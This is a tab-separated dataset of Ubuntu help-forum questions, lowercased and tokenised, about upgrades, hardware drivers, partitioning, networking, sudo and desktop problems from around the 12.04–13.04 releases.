magic_url=play_pause targetenvironment=unity # ... ( and similarly for next and previous ) however , i do n't know what urls to give it , and how to make it not open new windows but stay in the already open one !
293157	how to upgrade 12.4 to 13.10	i 'm tempted to upgrade my desktop running 12.4 to 13.4 as 13.4 runs really well on my laptop . can i do this without upgrading to 12.10 first ( want to avoid fresh install ) or is there no way arround it ? thanks in advance , jowan
293158	how do i get my sony cybershot w510 to connect ?	i 'm new to ubuntu 12.04 ( only installed it on sunday ) , and enjoying what i have been learning , but having a bit of a problem ! i want to get my sony cybershot w510 to connect to the computer . i do have a card reader which i can use if necessary to get the photos off , but would be nice to get the camera working ( i 'm a perfectionist ! ) i plug it in , and press the play button ( as this is what the camera instructions say to do ) but nothing happens . i know my usb devices work fine , because plugging in a usb memory stick or usb hard drive results in the device appearing on the desktop so i can use it . even my ipod will mount , which i 'm led to believe is tricky enough ! i would be grateful if someone could walk me through getting this connected ! i am fairly good at the technical side of things , so do n't be afraid to do your worst !
293159	how do i assign a network ip & enable ssh during installation ?	i need to have a bootable usb flash disk with ubuntu 12.04 x64 efi integrated any ideas ? is there a way to install ubuntu 12.04.2 x64 as text based installation ? like the ubuntu server install ? and assign it network ip / enable ssh during installation ?
293162	files button on the side opens a new window instead of minimized window ?	if i open my hard drive from the hard drive icon ( i have 2 hard drives ) and then i minimize it , it minimizes to the files and when i try to restore it it opens a new file manager ( this happens weather i open the drive from the file manager itself or if i open the drive from the unity bar ) . in order to get back i need to alt+tab . is there a way to fix this ( ubuntu 13.04 the best release ever )
293163	gedit opens different window though it should not	it 's a follow-up of why does gedit keep randomly opening new instances when opening files from nautilus ? on ubuntu 12.04 with unity : i double click on a text file on the desktop or through nautilus . gedit opens a new instance . that 's fine . i open gnome-terminal on the same display/screen . i type `` gedit '' , it opens a new different window on the same display/screen . why is that ? i tried to log `` is_in_viewport '' referenced in the above question , but i did n't get useful information . what is missing in the terminal environment so that gedit opens a new window though it should not as i 'm on the same screen/display and the border condition is not true . note that in the terminal , echo $ display returns :0 and echo $ screen returns nothing .
293167	installation on os x mountain lion : will not create bootable usb	i have followed the procedure described when trying to create a bootable usb for ubuntu 13.04 on os x , but i get a message that saying that the disk is not readable on this computer . am i using the wrong .iso , or is the disk of the wrong format ?
293175	why does my dell latitude e6520 have internet in install but not after	hey all i installed ubuntu 13.04 x64 last night had internet in the installer by going to additional drivers and enabling brodcom ( sic ) driver but after install it wo n't let me enable it . i have no ethernet driver ether.. ps not home right noe but when i am i 'll upload full name of my wirelrss thanks in advanced in additional drivers its called broadcom bc 43228 802.11a/b/g/n like i said i activated it on the live disk but ca n't activate it noe and my ethernet is n't working eather
293181	how to use readline to insert a predetermined string onto the command line with a shortcut when using bash ?	is it possible to have an arbitrary amount of text placed next to the cursor on the command-line ? i have heard that it is possible using bash , but i am not sure how to accomplish it . it seems to be possible with readline , but the syntax of the shortcut seems to be rather obscure , as when i place it in my ~/.inputrc and use the shortcut , nothing appears in the terminal . can anyone explain the correct syntax of the entries in ~/.inputrc ?
293183	cinnamon stops working on ubuntu 13.04	i upgraded from 12.10 to 13.04 and cinnamon stops working . when i load cinnamon it only displays a slow responding cursor over a black screen . and the desktop never loads . so ( for getting access to my desktop ) i purged cinnamon and did this : sudo /usr/lib/lightdm/lightdm-set-defaults -s unity and when it didnt work i tried this dconf reset -f /org/compiz/ unity -- reset-icons & disown and it restored unity . now when i install cinnamon it again runs into same old problem of - dark screen with only a cursor . what do i do for getting cinnamon ?
293184	how to set quickly to use python3 when creating new applications in ubuntu 12.04	i 'm just starting to learn python and use the standard set of tools in ubuntu 12.04 ( quickly , glade , gedit ) . when i do quickly create ubuntu-application foo the application uses python 2.7 by default . i would rather use python3 since it 's the version i 'm learning and the plan is to drop python2 by 14.04 . how do i configure quickly to use python3 when creating new applications ? ( i already have it installed , but do not want to set it as the default for the entire system to avoid breaking things ) .
293186	is there any system restore in ubuntu like windows ?	i followed the instructions that in install gnome 3.8 in ubuntu 13.04 and then after restarting many programmes stopped working and fails to start like rhythombox / cairo dock / totem / weather / empathy is there any way to cancel what i did or remove installed packages ? they 're a lot of packages ( about 90 mb ) and i ca n't purge them because i can not remember them all .
293189	wd elements 2tb desktop external hard drive	i have just purchased a wd elements 2tb desktop external hard drive online , and as i sometimes do ( as i am new to ubuntu ) , i forgot to check if it compatible with ubuntu . i called wd and they said it may work -- i googled it and could not find a simple answer . if anyone knows ( or has personal experience with this product ) if this is compatible with ubuntu v12.04 ( i.e . plug it in and it works ) , please let me know . if it involves messing with the usb compatibility or something along those lines , if someone could layout some simple steps that would be awesome ( if it is too complicated then do n't worry about it ) . any information would be greatly appreciated . thank you so much .
293195	how can i turn off window titlebars ( window decorations ) in gnome shell/mutter ?	there 's a shell extension called maximus that disables window decorations when windows are maximized , but i 'd like to disable window decorations entirely , for all windows ( just using keyboard shortcuts to work with them ) . is there an easy way to do that ?
293200	upgrade manager malfunction	my upgrade manager wo n't upgrade anymore . even the partial upgrade is n't working due to an unresolvable problem . i was thinking i would upgrade to the next version but i am unsure how to go about it . should i just re-install ubuntu ? ? i am an ubuntu newbie . thanks for any help out there
293203	how can i add a ppa from a previous release ?	i 've been trying to get vim with the breakindent patch applied , but it 's only available through quantal , and i 'm running raring . is there a way to force-install a ppa from a previous release ? i tried manually downloading all the packages and running sudo dpkg -i but i get lots of errors about dependencies , some of which do n't look like they can be resolved . am i stuck with having to compile vim myself ?
293219	is this ram usage normal ?	my system is ubuntu 13.04 64 bit + unity and it uses ~600mb with no other processes-apps open and with preload 900mb , just the core system . is this the expected amount ? it seems a bit steep to me but perhaps this is normal behavior . ps : my pc has 16gb ram
293220	ca n't run x-executable through gui/shell	i 'm pretty new to ubuntu and linux in general and today i was trying to get g++ to work . i compiled : # include < iostream > int main ( void ) { std : :cout < < `` hello world '' < < std : :endl ; char c ; std : :cin > > c ; return 0 ; } and then i compiled it with g++ main.cpp -o main and it compiled correctly . the problem is when trying to run it from the shell ( gui ) , it just wo n't run . running it from the terminal works ( with ./main ) . i 'm not sure what i 'm doing wrong here .
293221	sony vaio ( sve15129cab ) built in sd card reader ( rts5116 ) realtek not working ubuntu 12.04	card reader was working fine when i was using live usb , but after installation and upgrading it is not even detecting . initially i got mmc0 error 110 ( syslog ) . after that i tried to install the driver from realtek website , still no yield . lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati turks hdmi audio [ radeon hd 6000 series ] 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) **08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) ** 0e:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) lsusb 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati turks hdmi audio [ radeon hd 6000 series ] 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 0e:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) please help .
293224	how would i create startup and logoff music for ubuntu 13.04 ?	hey i am trying to create startup and log-off sounds for ubuntu 13.04 . i have two mp3 files . i have sox and was wondering if i could create a .sh file ( make it executable ) and make it point to play a set .mp3 . what i 'm trying to do here is basically set up my linux box to be a mock up of hal9000 . with `` good morning dave '' and `` daisy ... daisy ... '' when it logs off . any help would be appreciated .
293227	general install procedure	i 'm a new and interested user . i have an older inspiron mini with windows 7 that does n't have enough ram to do anything so i thought i would give ubuntu a try . i was able to download the image file and place it on the flash drive . i also modified the bios and got it to boot from the usb . now i am in grub4dos and have no idea what to do next . i think i am missing a big part . please help !
293235	did i just delete everything with find -exec mv ?	i tried to figure this out on my own . here 's the command i used in the terminal : find . -name `` *.jpg '' -exec mv { } pictures \ ; i did not create a directory named pictures first . what happened was a file named pictures.gif was created . did it find the files then overwrite them as it moved them ? what is this pictures.gif file that has been created as a result of this command ? are the files still possibly on the drive somewhere ?
293236	chaining apt commands	i 've noticed that the majority of ubuntu help websites present apt commands in the following format : sudo add-apt-repository ppa : [ ppa-address ] sudo apt-get update sudo apt-get install [ application-name ] but i know that apt commands like this one work too : sudo add-apt-repository ppa : [ ppa-address ] & & sudo apt-get update & & sudo apt-get install [ application-name ] is there a particular reason that most sites present in the first format ? are there known issues with chaining commands with & & , or to put it another way are there any benefits/drawbacks to using either method ? further , other then loss of internet , are there any circumstances in which an apt command might fail ?
293240	ubuntu gets freezed , and it is slow	first of all , sorry about my english . i installed ubuntu like , 5 months ago , but now my ubuntu gets freezed and stuck , it waits too way long to load an application , i had to run another os to do somenthing that i could perfectly do in ubuntu . do you guys know , how to `` clean '' my ubuntu ? i mean , to make it faster ? like it used to be at the beginning thanks in advance .
293244	problem with speech dispatcher	i had some problems with shutdown/restarting ubuntu 13.04 . it used to hang in a black screen with some codes about speech dispatcher . i searched the web and found a solution : sudo nano /etc/default/speech-dispatcher inside the file i changed the run property to yes , so the file started looking like this : # defaults for the speech-dispatcher initscript , from speech-dispatcher # set to yes to start system wide speech dispatcher run=yes i did so , the problem was solved but it disabled my internal speaker and mic . it looks like i have to choose between proper shutdowns and working mic/speaker . is there any solution to have them both working ? thanx in advance . hardware : dell inspiron n5110 distro : ubuntu 13.04 64bit
293249	two nic 's - one for internet , other for lan	running 13.04 32bit . i 'm trying to accomplish something that im sure is simple . i have two nic 's installed on my pc . eth0 - connected to office network with static ip . eth1 - connected to internet via router with dhcp . i would like to have all regular internet traffic going through eth1 and all internal office stuff going through eth0 . from what i have read online so far , i understand i need to setup a static route . can anybody instruct me on how to do this . thanks
293253	which flavor i should use for a p4 , 512 ram ?	i have bee months trying to revive a pc that is so old , people that i told about it just say to junk it . but i believe that there is a linux os out there that can help me out . the type of pc that i 'm trying to revive is a 2001 gateway desktop with an intel pentium 4 processor . the processing speed is 1.50gz , and the system bus speed is 400mhz . the cache ram is 256kb and the total memory with a friend 's driver that i installed on it is 512mb but 256mb with the one it came with . it also runs on windows xp but the os is messed up . its so slow that i booted up lubuntu up there once ( and that was my only time ) , and it was lagging a lot . i tested on my laptop ( hp amd turion 64x2 with 2gb ram ) , and it worked perfectly . ubuntu or any os linux can i install on my computer ?
293254	ubuntu 13.04 and java gui	i 'm working on rescue agent simulation , we have a main server that run our code and its programmed in java . our server has lag under ubuntu 13.04 , but it run smoothly in ubuntu 12.10 and 12.04 . so my question is , what is the different in these versions of ubuntu ?
293260	can i change where my /home folder is located ?	i want to make my /home folder on a separate partition on my harddrive . how can i do that , if there is a way ?
293264	the system is running in low-graphics mode ( 12.04 )	every time i boot i get the `` the system is running in low-graphics mode '' error . the problem is similar to this one : `` the system is running in low graphics mode '' i get this message when i boot my ubuntu , but i do n't think i can use the answer , because i do not have the same graphics card ( mine is intel ) . i have searched askubuntu for a solution and tried some of the suggestions found here : how to fix `` the system is running in low-graphics mode '' error ? . i 'm using an hp desktop with ubuntu 12.04 . i have never had this problem before until about 12 hours ago . the only thing i can think of is that i had just installed about 35 updates via the update manager . the next time i switched on my computer i got the `` the system is running in low-graphics mode '' error . here is what i have tried : switching to gdm ( http : //askubuntu.com/a/128408/55223 ) after realising that i had used almost all my disk space i freed some by deleting a lot of movies and then rebooting . reinstalling ubuntu-desktop someone suggested editing the lightdm conf file ( http : //askubuntu.com/a/141607/55223 ) , but i did not need to do this since the line was already `` unity-greeter '' ( it 's tricky for me to copy any output and paste it here as long as i have this problem , since i ca n't get to the desktop etc . ) after trying all this , i chose to just reinstall ubuntu ( 11.10 ) . after doing that the problem was gone ! but as soon as i upgraded to 12.04 and rebooted i got the error message again : ( then tried removing the file `` /etc/x11/xorg.config.failsafe '' and restarted lightdm gui server as in ( http : //askubuntu.com/a/289287/55223 ) . this did not help either . i also tried running startx and got : kb @ kb-hp-compaq-4000-pro-sff-pc : ~ $ startx x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic i686 ubuntu current operating system : linux kb-hp-compaq-4000-pro-sff-pc 3.2.0-41-generic-pae # 66-ubuntu smp thu apr 25 03:50:20 utc 2013 i686 kernel command line : boot_image=/boot/vmlinuz-3.2.0-41-generic-pae root=uuid=f5d21c1a-a302-4688-948b-470818bfb967 ro quiet splash vt.handoff=7 build date : 11 april 2013 01:04:30pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : thu may 9 22:35:42 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error i hope some of this info helps .
293265	eclipse loses focus after switching workspace	this might be related to this question . i am using ubuntu 13.04 and eclipse juno service release 2 . i use eclipse with some eclipse 's views ( panes ) detached from the main window , because i have two monitors . however , in that environment , the main window always lose its focus after switching ubuntu 's workspace . this is really annoying because i have to change the focus every time before i start coding . this is how to reproduce the problem : open eclipse , detach a pane ( project explorer might be fine ) from the main window , and focus on the main window . switch ubuntu 's ( not eclipse 's ) workspace . switch again back to the workspace where eclipse exists . now the detached pane gets the focus , not the main window . does anyone have a workaround for this ?
293266	i am unable to update ubuntu 12.04 lts . says check internet connection	i can not install my updates . i used the following information how do i fix a `` failed to download package files '' error ? but it did n't work . in the software sources window under the `` ubuntu software '' tab everything except the source code is checked . under the `` other software '' tab i have canonical partners and canonical partners ( source code ) and that 's all . when i try to update my software it says : failed to download repository information check your internet connection . i have ubuntu 12.04lts please help
293270	ca n't add any ppa in 13.04	i 've made a clean install of 13.04 and just ca n't add any ppa i try . the output is always the same , something about my internet connection ( that works fine with anything else ) . heres an example ( sorry my instalation is in portuguese ) sudo add-apt-repository ppa : ehoover/compholio [ sudo ] password for andre : não foi possível obter informações do ppa ( https : //launchpad.net/api/1.0/~ehoover/+archive/compholio ) , por favor verifique sua conexão com a internet . andre @ sapienz : ~ $ sudo add-apt-repository ppa : cooperjona/lightread não foi possível obter informações do ppa ( https : //launchpad.net/api/1.0/~cooperjona/+archive/lightread ) , por favor verifique sua conexão com a internet . a possible translation would be `` it was not possible to obtain information from the ppa , please verify you internet connection . '' i 'm not behind a proxy , so this is not this question . i do n't know what could be doing this , and i really need to install some apps like netflix and lightread to make this installation worthy . thank you
293273	boot-folder too small for upgrade from ubuntu 12.10 to 13.04	when updating my ubuntu from 12.10 to 13.04 i get the message 'your boot folder is too small , make more space ' although my harddrive has still plenty of place left . how can i make that boot folder bigger ?
293274	how to extract still images from vob file	how can i extract still images ( jpeg ? ) from a vob video file ?
293275	what is lxc and how to get started ?	i will appreciate if someone could introduce me to lxc and tell me how to get started with this technology ? in which cases does it make sense to use , and in which should i stay away from it ?
293277	bluetooth discoverability	hi my bluetooth is present in hardware and i can turn it on in settings but for some reason it is not enabled and i can not turn on visability ( discoverability ) .how can i fix this in a dell inspiron mini ? thanks
293280	ubuntu not showing up outside my computer	i downloaded ubuntu 12.04 ( i think ) with my dell dimension 4500 running windows xp , but the only way i can find it is to look in my computer ( c drive ) . i looked for an executable file , and since there was n't one , i tried to open the `` bootstrap '' file , which the computer could n't handle . then i downloaded easyfileviewer , only to discover that it requires registration . what do i do now ?
293281	k9copy & acidrip do not see dvd but vlc plays it just fine	bought `` up in the air '' . like to make backup copies to take w/ me when i travel . vlc plays the dvd perfectly . i run either k9copy or acidrip and neither one 'sees ' the movie in sr0 . i 've had this happen w/ a couple of other dvds recently . is there a new encryption out ? i 've tried this on my xp box using dvdshrink and the program not only crashes , the computer reboots ! what 's going on ? now have tried dvd : :rip . the program crashes ! dvd95 converter crashes ! help !
293284	booting into ubuntu 12.10	when i first installed ubuntu 12.10 the boot loaded quickly without going through a long loaded screen . now i get the long screen of all the drivers and recovery before it finally boots . is there a way to get it back to the short boot screen ? thanks
293287	should i install via alien or just convert and then use dpkg ?	the question is simple ( maybe too simple ) : what does alien do when with the -i option ? does it use dpkg to install the package ? dpkg ( or apt-get ) manages packages , tracks when , where and how they are installed , dependencies also.. so i would like to install a package via the managing system to have these advantages . does alien -i do it for me ? ps googled for an answer -- not that lucky today , man alien does n't say much on -i .
293288	how do i get windows xp to display a boot menu at all ?	when i started up my dell dimension 4500 with windows xp again after i installed ubuntu , i do n't even get a boot menu to choose . how do i make one appear ?
293289	install netbeans from a local computer to a remote workstation	i 've downloaded the netbans.sh file from its official website and i 'd like to install it to some workstations without having to copy it in any of those workstations . can i remotely ssh connect and install the sh program without having to copy the program to any single workstation ?
293290	what are relevant disk benchmark settings for a desktop system	note : this is not a question about which tools to use to fine tune disks . i am about to replace an hd with an ssd and also to fine tune some of the disk settings . also , i might distribute my filespace around the ssd and hd according to space and use . what are the relevant benchmarks ( e.g . of the kind that bonnie++ provides ) that one needs to keep an eye on . also , what pitfall might there be when testing them on hd and ssd ? typical use will be for a desktop system : office type work , compiling some source , maybe iterating through a collection of large files for some data analysis , web browsing . edit : i maintain that this is not a duplicate of `` how to check hard disk performance '' . i am not interested in the kind of tools that will perform benchmarking but rather what the benchmarks are that are important for a particular user profile ( a desktop user ) . i know that bonnie++ , hdparm , and ( with care ) dd can all give me some idea of how quickly data can move to and from the disks . that in itself does not answer which of the many parameters offered is of importance when tuning a desktop system .
293293	urxvt has lags in ubuntu 13.04	i use urxvt as my default terminal and zsh as default shell . i use this two tools everywhere , but after today upgrade from ubuntu 12.10 to ubuntu 13.04 i got some lags in term . lags means - when i type command , term does n't show last character , up/down through history , prompt does n't updates with right command ( can leave the same or jump few commands back ) this is only with zsh , not in bash . how to fix this ?
293294	how to create images from iso for kvm ?	hi all : ) i want to create a kvm image from an existing iso file ( for glance on openstack ) , but i did n't find how to do it . can you help me pleaaase ?
293298	something strange is going on with the search	when i click the search icon it creates a blue screen which covers the whole screen except for the button bar . it goes back to normal when i click the button again . what can i do to get it back ?
293300	ubuntu 12.04lts fixing recursive fault but reboot is needed	i have installed 12.04lts on an old aspire 5520 with the latest bios all goes well , the propriety gpu driver works and i get all the updates . as soon as i install the proprietary broadcom sta driver for wireless card , and restart the machine i get he fatal `` fixing recursive fault but reboot is needed `` this persists after multiple reboots . it has to be the driver causing this since it was working fine beforehand . the problem i have is how to fix this without re-installing the whole system again ? i can not perform the acpi=off since i can not start a term as i can not get into desktop . and what broadcom wireless driver should i use since the one suggested by ubuntu causes this fault.. any suggestions would be greatly received ! thanks pete
293303	how to be warned if terminal has sudo privileges and also show how much time is left ?	how to see in the terminal that you have sudo privileges ? ( so knowing i have these privileges , i can just type sudo -k ) it would be better to not add too much information into the terminal also , just some kind of simple and small alert ! remaining time is impossible , right ? also , how to see how much time i still have with those privileges on that specific terminal ? ( so i can just let it end instead of typing sudo -k ) . i think that remaining time could show up each time i press enter key . edit : i researched more and found that /var/lib/sudo/ $ user/ $ npts ( where $ npts is current terminal pts as of ps -p $ $ ) has its timestamp updated everytime a sudo command is issued , and it is only accessible if you use a sudo command , so the remaining time will always be the configured one ... ps . : alternatively to that , i tried alias sudo='sudo -k ' but i dislike having to type the password for every command ... and also , this alias sudos='sudo -k ' ( or alias ssudo='sudo -k ' , good if you typed a long line , just press home and type 's ' ) works if you only want to issue one command by typing sudos . but i still miss to know when i have normal sudo privileges to know i need to act ...
293305	how should i partition my new ssd ? ( journaling on another hdd ? )	i know this might seem a strange question and i know i should buy a good ups but i already had had two of them and none of them did a good job . i 'm living in a house where many power outages occur ( please , do n't ask me why ... ) so data loss risk is very high . i bought a new ssd but i 'm planning to keep my old hdds , so i thought about this configuration : / on ssd ( ext4 of course ) /var on hdd /tmp on hdd /swap on hdd ( swappiness set to 1 since i have 4 gb of ram ) scheduler = deadline or noop ( can you point me a good way to do this permanently ? ) journaling = enabled ( due to the power losses i ca n't just disable it but is it possibile to store the journal on another hdd ? if yes , how ? ) discard and noatime in fstab what do you think about that ? the ssd i bought is a samsung 120 gb 840 series and my mainboard supports sata2 . is it really needed to put var , tmp and cache on another hdd ? what if i just install the whole system on my ssd , how many time do you think it will last ? thank you so much and sorry for the odd question .
293311	how to upgrade the php version from 5.3.x to 5.3.y ?	i just downloaded the development release of drupal8 for testing purpose . when i try to install it shows the following error : your php installation is too old . drupal requires at least php 5.3.10 . my current php version is 5.3.8 . how do i make update only to php ? or do i need to update mysql also ?
293312	execute a script upon logout/reboot/shutdown in ubuntu	i 'd like to run a .sh file using bash on logout and shutdown of ubuntu . i have searched up and down the web and have found only fixes for kde and gnome . the script is simple , i just need to know if i can add the line of code to the `` logoff/shutdown '' file or if i need to reference it in another script .
293316	ubuntu only lets me use 10gb of my 305gb hard drive	i have a 305 gb hard drive but ubuntu only lets me use 10 of it . i do n't know why but it does . can someone explain this to me like i 'm a 12 year old please because i just tried to fix it with manual partition and i wiped my whole damn computer .
293320	is there any way i can have two users on my system playing games simultaneously ?	i have a fairly powerful desktop computer where i can run two instances of a game ( one natively and one in a win7-64 bit virtualbox ) . i was wondering if i there was any way to connect a laptop to my desktop where the laptop could log in as a user and play the games on my computer as if they are playing directly from my desktop , while i also logged in and doing things ? i have a fairly old laptop that has no other use which is why i ask . so is there any way of doing this ? like streaming the audio and video for that user out to the laptop , and the input events from the laptop 's keyboard in ? the laptop and desktop would be linked with ethernet not wireless so there would definitely be the bandwidth . it might just be a dream , but it would be really cool . thanks for any answers ! the solution : i got it working ! using freedom-ben 's post i setup everything in those two links to get x11 forwarding with audio working . the one problem you will have is that when you are using a really old laptop as the client , any opengl applications wont work very well . this is because it forwards all the opengl calls to the client . i found an amazing thing called virtualgl , which renders everything on my desktop , and sends only the frames to the client . if you are interested in this , visit this post : https : //bbs.archlinux.org/viewtopic.php ? id=134207 . it works great when on a local machine , very little bandwidth needed .
293321	sudo su fails with 'unable to change to sudoers gid : operation not permitted . ' fault	i have installed ubuntu and now i want to install flex . it asks for password but when i type my password , it asks me the password for root . when i enter the password which i had specified during installation , it says , `` your authentication attempt was unsuccessful . please try again . '' whether the password for root is locked or is it something else ? the passwords i entered were correct . i have also tried sudo su but it says , `` unable to change to sudoers gid : operation not permitted . '' i have tried su also but when i enter the password it says , `` authentication failure '' . please help me out . i thought that maybe this is because the root user is locked by default . if so , how to recover from it ? and if something else is the issue then what to do ?
293322	wireless card wo n't connect on system boot	my wireless card wo n't connect to the network on system boot on ubuntu 13.04 64bit ( server ) . below is my system info : /etc/netwrok/interfaces # wifi auto wlan0 iface wlan0 inet dhcp wpa-ssid myssid wpa-psk ssidpass uname -r 3.8.0-19-generic lsusb bus 001 device 002 : id 0b05:1784 asustek computer , inc. usb-n13 802.11n network adapter ( rev . a1 ) [ ralink rt3072 ] it connects just fine if i run the following command : service networking restart could you point me to a direction on how to troubleshoot this ? edit 1 : syslog ( records related to wlan0 right after system reboot : may 10 21:55:35 localhost kernel : [ 6.503790 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 10 21:55:37 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 4 ( xid=0x62d88386 ) may 10 21:55:41 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 ( xid=0x62d88386 ) may 10 21:55:48 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 ( xid=0x62d88386 ) may 10 21:56:02 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 9 ( xid=0x62d88386 ) may 10 21:56:11 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 17 ( xid=0x62d88386 ) may 10 21:56:28 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 18 ( xid=0x62d88386 ) may 10 21:56:46 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x62d88386 ) may 10 21:56:56 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 16 ( xid=0x62d88386 ) may 10 21:57:13 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 18 ( xid=0x62d88386 ) may 10 21:57:31 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 19 ( xid=0x62d88386 ) may 10 21:57:50 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 12 ( xid=0x62d88386 ) may 10 21:58:02 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 19 ( xid=0x62d88386 ) may 10 21:58:21 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 ( xid=0x62d88386 ) may 10 21:58:36 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 18 ( xid=0x62d88386 ) may 10 21:58:54 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 ( xid=0x62d88386 ) may 10 21:59:09 localhost dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 17 ( xid=0x62d88386 ) i also did dmesg | grep wlan0 and only got one line ( see below ) : [ 6.391856 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready
293323	amd a8-4500 apu with radeon hd 7640g	i have installed many versions of linux lately , trying to free myself from windows , i have played with linux over that past few years , but i was into gaming , and until recently could n't fully commit to running a linux laptop . i for the life of me can not get my graphics card to work with the amd drivers to support full 3d , and full performance . the gallium3d driver gives me slow , and undesirable performance and battery life . i would like to be running kubuntu 13.04. withe the amd proprietary driver working . any help would be greatly appreciated , as i have exhausted my alternative resources to find my own solution . my graphics card is the dual graphics that is part of the amd a8-4500 apu ( hd 7640g )
293325	is there any chance to install the ubuntu touch preview on a generic tablet ?	i 've been trying to install the ubuntu touch preview on a generic tablet , but i still have no results . it simply wo n't install ! it doesnt even have the volume button , to enter the boot menu i have to do it from the android settings menu ! thks oscar gutierrez
293328	how to remove `` messaging menu and unity launcher integration '' from thunderbird ?	i removed unity from my system ( ubuntu 13.04 ) , however , there is a remaining file located in thunderbird extensions , which is `` messaging menu and unity launcher integration '' . i searched for the file in synaptic , but i did n't find it . my question is : what is the name of the package ?
293338	need help with unison	i finally converted my desktop machine from windows vista to lubuntu 13.04 . i am having trouble getting the unison file sync program ( version 2.40.65 ) to work on the lubuntu machine , despite trying very hard all afternoon googling through various forums . here is the basic setup : lubuntu desktop machine ( dtm ) ; dlink network accessed storage device ( nas ) , which is mounted on dtm as /mnt/nas ( in fstab , cifs , defaults ) . unison works going from nas to dtm . however if a file is created or updated on dtm , unison fails to propagate over to nas . it creates a new file .unison.newfile.xxxx.unison.tmp with the correct size in the nas destination directory , but unable to rename it . the exact error message is failed : error in digesting .unison.newfile.xxxx.unison.tmp .unison.newfile.xxxx.unison.tmp : permission denied . if i run unison under sudo , then changes from dtm do propagate over to the nas . however , changes from the nas side get copied to dtm as root , which causes endless trouble for m by the way , on my old windows vista , i ran unison under cygwin without having any problem . your answer is greatly appreciated . thank you .
